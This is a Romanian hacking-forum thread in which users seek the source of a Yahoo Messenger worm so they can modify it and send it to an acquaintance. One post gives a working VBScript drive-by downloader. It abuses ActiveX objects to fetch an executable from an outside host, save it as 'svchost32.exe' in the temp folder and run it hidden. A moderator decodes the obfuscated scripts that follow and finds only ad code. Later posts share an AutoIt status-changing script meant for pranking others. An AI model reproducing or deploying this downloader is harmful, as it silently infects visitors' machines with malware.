Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
marymari la Simpatie.ro
Femeie
24 ani
Bacau
cauta Barbat
24 - 53 ani
Hacking and more... / n00bs / sursa virusului de la YM care trimite mass`uri Moderat de Shocker
Autor
Mesaj Pagini: 1
Y2K`
Elite Member

Din: 666
Inregistrat: acum 17 ani
Postari: 970
cine are sursa sau programu este rugat sa posteze aicea

pt ca vreau sa il modific si sa il trimit  la un "fffff bun preten"


p.s. : PLS PLS PLS PLS FARA ALTE COMENTARI


pus acum 17 ani
   
ThiefUnU
Elite Member

Inregistrat: acum 17 ani
Postari: 578
si eu vreau

_______________________________________
Layout challange :
NU DA CLICK !!


pus acum 17 ani
   
Y2K`
Elite Member

Din: 666
Inregistrat: acum 17 ani
Postari: 970
ThiefUnU fii sigur ca aproape totzi o vor dar nu posteaza numa aja sa faca psoturi

pus acum 17 ani
   
ThiefUnU
Elite Member

Inregistrat: acum 17 ani
Postari: 578
nu vor sa impartaseasca marele secret cu noi

_______________________________________
Layout challange :
NU DA CLICK !!


pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
intra pe o pagina infectata cu cacatul ala....intra din mozilla sau opera si vezi de unde iei tu executabilul..si il salvezi si il dezasamblezi

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

pus acum 17 ani
   
Y2K`
Elite Member

Din: 666
Inregistrat: acum 17 ani
Postari: 970
observ ! hai ma cu curaj ca nu va manc

pus acum 17 ani
   
Y2K`
Elite Member

Din: 666
Inregistrat: acum 17 ani
Postari: 970

Sad_Dreamer a scris:

intra pe o pagina infectata cu cacatul ala....intra din mozilla sau opera si vezi de unde iei tu executabilul..si il salvezi si il dezasamblezi


pai nu mai ii niaieri :| o fost shters


pus acum 17 ani
   
big chuck
A firewall

Din: Inside the band
Inregistrat: acum 17 ani
Postari: 589


Code:

<script language="VBScript">
    on error resume next
    dl = "http://www.vnzw.com/host2.exe"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="svchost32.exe"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
    </script><body onload="window.blur();">

</head>
<body bgcolor="lavender">
<br><br><br>
<center>





<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%297Gwgvmtx%2964x%7Dti%297H%2966xi%7Cx3nezewgvmtx%2966%297I%297G%296511%294H%294Eksskpicehcgpmirx%2964%297H%2964%2966tyf1984%3C9%3B8557487649%2966%297F%294H%294Eksskpicehc%7Bmhxl%2964%297H%2964%3B6%3C%297F%294H%294Eksskpicehclimklx%2964%297H%2964%3D4%297F%294H%294Eksskpicehcjsvqex%2964%297H%2964%2966%3B6%3C%7C%3D4cew%2966%297F%294H%294Eksskpicehcx%7Dti%2964%297H%2964%2966xi%7Cxcmqeki%2966%297F%294H%294Eksskpicehcglerrip%2964%297H%2966%2966%297F%294H%294Eksskpicgspsvcfsvhiv%2964%297H%2964%2966444444%2966%297F%294H%294Eksskpicgspsvcfk%2964%297H%2964%2966J4J4J4%2966%297F%294H%294Eksskpicgspsvcpmro%2964%297H%2964%29664444JJ%2966%297F%294H%294Eksskpicgspsvcxi%7Cx%2964%297H%2964%2966444444%2966%297F%294H%294Eksskpicgspsvcyvp%2964%297H%2964%296644%3C444%2966%297F%294H%294E3311%297I%297G3wgvmtx%297I4')</script>
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%297Gwgvmtx%2964x%7Dti%297H%2966xi%7Cx3nezewgvmtx%2966%294H%294E%2964%2964wvg%297H%2966lxxt%297E33tekieh62ksskpiw%7Drhmgexmsr2gsq3tekieh3wls%7Bcehw2nw%2966%297I%294H%294E%297G3wgvmtx%297I4')</script>



_______________________________________
The answer is not in the box,the answer is in the band

pus acum 17 ani
   
Shocker
Super Moderator

Din: localhost
Inregistrat: acum 17 ani
Postari: 2084
Nu are ce sa faca cu asta big_chuck, pentru ca asta e doar scriptul care lanseaza .exe-ul respectiv.

El vroia codul sursa de la .exe sau chiar exe`ul. Insa cum zicea nu mai exista aceste exe`uri acolo unde trebuia sa fie [nici linkul din scriptul asta nu mai merge].


Anyway, codul asta a mai fost prezentat si de Y2K` intr-un tutorial facut de el.
P.S.: Vedeti alea 2 linii de jos ?:

big chuck a scris:



Code:

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%297Gwgvmtx%2964x%7Dti%297H%2966xi%7Cx3nezewgvmtx%2966%297I%297G%296511%294H%294Eksskpicehcgpmirx%2964%297H%2964%2966tyf1984%3C9%3B8557487649%2966%297F%294H%294Eksskpicehc%7Bmhxl%2964%297H%2964%3B6%3C%297F%294H%294Eksskpicehclimklx%2964%297H%2964%3D4%297F%294H%294Eksskpicehcjsvqex%2964%297H%2964%2966%3B6%3C%7C%3D4cew%2966%297F%294H%294Eksskpicehcx%7Dti%2964%297H%2964%2966xi%7Cxcmqeki%2966%297F%294H%294Eksskpicehcglerrip%2964%297H%2966%2966%297F%294H%294Eksskpicgspsvcfsvhiv%2964%297H%2964%2966444444%2966%297F%294H%294Eksskpicgspsvcfk%2964%297H%2964%2966J4J4J4%2966%297F%294H%294Eksskpicgspsvcpmro%2964%297H%2964%29664444JJ%2966%297F%294H%294Eksskpicgspsvcxi%7Cx%2964%297H%2964%2966444444%2966%297F%294H%294Eksskpicgspsvcyvp%2964%297H%2964%296644%3C444%2966%297F%294H%294E3311%297I%297G3wgvmtx%297I4')</script> 
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%297Gwgvmtx%2964x%7Dti%297H%2966xi%7Cx3nezewgvmtx%2966%294H%294E%2964%2964wvg%297H%2966lxxt%297E33tekieh62ksskpiw%7Drhmgexmsr2gsq3tekieh3wls%7Bcehw2nw%2966%297I%294H%294E%297G3wgvmtx%297I4')</script>



Asta nu mai tine de codul malitios.
Daca va uitati mai bine asta e defapt:
---------------------------------------------------------------------------------------------
<script language=javascript>document.write(unescape('%3C%... blabla...'));dF('%297Gwgvmtx%29....blabla...297I4');

<script language=javascript>document.write(unescape('%3C%... blabla...'));dF('%297Gwgvmtx%29....blabla...297I4');
</script>
---------------------------------------------------------------------------------------------
Acum... ce e scris in 2 locuri cu galben reprezinta exact acelasi lucru.
unescape este o functie (am putea spune ca e o functie de 'decriptare'). Resultatul de la acesasta functie, in cazul nostru este:

Code:

<script language="javascript">
function dF(s) {
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++) t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
</script>

Ce mai e si asta? O alta functie facuta de cel care a facut scriptul. Este tot o functie de decriptare.

Ceea ce am scris cu verde sunt alte texte care vor fi `decriptate` de functia unescape.
Rezultatul de la primul text `codat`:

Code:

<script type="text/javascript"><!--
google_ad_client = "pub-5408574113043205";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel ="";
google_color_border = "000000";
google_color_bg = "F0F0F0";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";
//--></script>

Rezultatul de la al doilea text `codat`:

Code:

<script type="text/javascript"
  src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

So... astea tin de reclame de la Google


_______________________________________
ShockingSoft is back
Freakz only
Comics of the day

pus acum 17 ani
   
ultrait
Pe lista neagra

Inregistrat: acum 17 ani
Postari: 10
Shocker....sa le spunem la uni,in caz ca ei nu stiu(sper ca tu sti),am dat odata de un programel pe net numi AutoIt....cu el am facut ceva....care schimba statusul la Y!Messenger intrun interval de timp,si  punea statusuri diferite(dupa cum stiti virusul de care vorbiti voi,face si el chestia asta,lam avut si eu =D),inca nu am aflat cum sa fac sa trimita mesaj la toti.Aici e linkul de unde  sa luati AutoIt,si va dau 'codu sursa' de la chestai de schimbat statusu....astai linku>>

pus acum 17 ani
   
ultrait
Pe lista neagra

Inregistrat: acum 17 ani
Postari: 10
codu de la chestia de schimbat statusu e aici >> ...il deschideti cu Script Editor de la AutoIt....daca nu intelegeti ceva din codu care lam scris acolo contactatima la marek_hacker2 pe Y!Messenger

pus acum 17 ani
   
Dark_Shad0w
Senior

Inregistrat: acum 17 ani
Postari: 114
@Y2k:
fara suparare din cate am vazut ai inceput sa devii "oaia neagra", si am mai observat ca majoritatea lucruriilor puse de tine aici sunt copiate, am observat asta cand am vazut cateva posturi FURATE de pe undeva crew.Sper sa iti revii

@ultrait:
Mersi mane, o intrebare, merge si in Yahoo messenger 8 ?, ca pentru yahoo messenger 7 am si eu :-)


_______________________________________


pus acum 17 ani
   
dTz
Membru nou

Inregistrat: acum 17 ani
Postari: 3
Care este codul pentru schimbat statusul ?

pus acum 17 ani
   
Crash Override
Helper

Din: HackPedia
Inregistrat: acum 17 ani
Postari: 275

dTz a scris:

Care este codul pentru schimbat statusul ?

Citeste posturile inainte de a posta .
Codul sursa il gasesti aici :

Edit: nu am avut timp sa ma uit pe codul sursa , de aceea am o intrebare , se poate opri din procese .exe-ul ? Sau ? Ca vreau sa il dau unei fete sa ma distrez cu stautusul ei :-)

Modificat de StreSs (acum 17 ani)


_______________________________________
Hacking.3xForum.Ro - Helper

pus acum 17 ani
   
OSHO
Elite Member

Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Simpatica chestia. Acum m-am uitat si eu peste cod

Normal ar trebui sa se poata opri. Daca nu il opresti, o sa se opreasca automat dupa ce se schimba statusul de cateva ori - nu am stat sa numar de cate ori se schimba.


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

pus acum 17 ani
   
Davidsss
Little Kevin

Inregistrat: acum 17 ani
Postari: 76
si ce tre sa faci cu codu asta undel bagi sau cum ??

_______________________________________


pus acum 17 ani
   
OSHO
Elite Member

Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069

Davidsss a scris:

si ce tre sa faci cu codu asta undel bagi sau cum ??

Il compilezi


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

pus acum 17 ani
   
TheBes7
user

Din: Camera Mea !
Inregistrat: acum 17 ani
Postari: 896
decii... schimbai tot ce era de schimbat , si acuma ce fac ? il fac .exe ? sau ?? si daca e sa-l compilez cum fac ? vazui ca a lasat OSHO link.. dar la ce ma bag de acolo ? ca nu stiu AutoIT

Modificat de No Comment (acum 17 ani)


_______________________________________
PinkMedia-Comunity Star

pus acum 17 ani
   
OSHO
Elite Member

Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
No Comment: Linkul ala e cu documentatie. Uita-te la compilare cum se face.

_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

pus acum 17 ani
   
S1las
Old School Member

Din: Kernel
Inregistrat: acum 17 ani
Postari: 490
Instalezi Autoit , copiezi de sus codu sursa, il pui in notepad, salvezi cu extensia "au3" si intri unde la-i salvat , ex My Documents si dai click dreapta pe el / Compile Script

_______________________________________
NU DA CLICK !!
Don ' t be a script kiddie all your life ...
Learn to think .... CrazZy-World


pus acum 17 ani
   
valy4ever2go
Senior

Din: Some were in Romania
Inregistrat: acum 17 ani
Postari: 123
sau ii da clik dreapta la codul sursa si dai compile script si ai terminat[[[[faci asta dupa ce ai instalat autoit !!!

_______________________________________
_________________________________
There's no place like 127.0.0.1!!"
_________________________________

pus acum 17 ani
   
ultrait
Pe lista neagra

Inregistrat: acum 17 ani
Postari: 10
pentru cei care nu au luat codu...sau nu mai merge luat...e aici:
WinActivate("Yahoo! Messenger")
WinWaitActive("Yahoo! Messenger")
Send("!m")
Send("u")
Send("n")
WinActivate("Enter your status message")
WinWaitActive("Enter your status message")
Send("Ce sa apara la status")
Send("{enter}")
;~ sleep=puneti cat vreti,e timpul cat o sa faca pauza
Sleep(3000)
WinActivate("Yahoo! Messenger")
WinWaitActive("Yahoo! Messenger")
Send("!m")
Send("u")
Send("n")
WinActivate("Enter your status message")
WinWaitActive("Enter your status message")
Send("Ce sa apara la status")
Send("{enter}")
;~ sleep=puneti cat vreti,e timpul cat o sa faca pauza
Sleep(3000)
si il puteti repeta de 10000 de ori ;).....daca nu intelegeti ceva >> marek_hacker2

Modificat de Shocker (acum 17 ani)


pus acum 17 ani
   
localhost
Senior

Inregistrat: acum 17 ani
Postari: 105
thx ff mult, cautam ceva de genu de mult timp

Modificat de localhost (acum 17 ani)


_______________________________________
There's no other place like 127.0.0.1
RDS = Random Disconnecting Service

pus acum 17 ani
   
ultrait
Pe lista neagra

Inregistrat: acum 17 ani
Postari: 10
npc....si nu adun postari sper sa va foloseasca sursa la ceva >

pus acum 17 ani
   
pudramadre
Little Kevin

Inregistrat: acum 17 ani
Postari: 77
app, cu ce extensie salvez codul??? exe, vbs, bat sau ce???? si iti multumesc si eu pt code, e chiar folositor.  

pus acum 17 ani
   
OSHO
Elite Member

Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
E in AutoIt

_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

pus acum 17 ani
   
RockWilder
Elite Member

Din: Real World!
Inregistrat: acum 17 ani
Postari: 894

pudramadre a scris:

app, cu ce extensie salvez codul??? exe, vbs, bat sau ce???? si iti multumesc si eu pt code, e chiar folositor.  


Extensia ".au3", trebuie sa ai AutoIT instalat,rulezi editorul de la AutoIT, pui codul acolo si il compilezi  .


_______________________________________
Only those who attempt the absurd will achieve the impossible. (M C Escher)

pus acum 17 ani
   
Pagini: 1  

Mergi la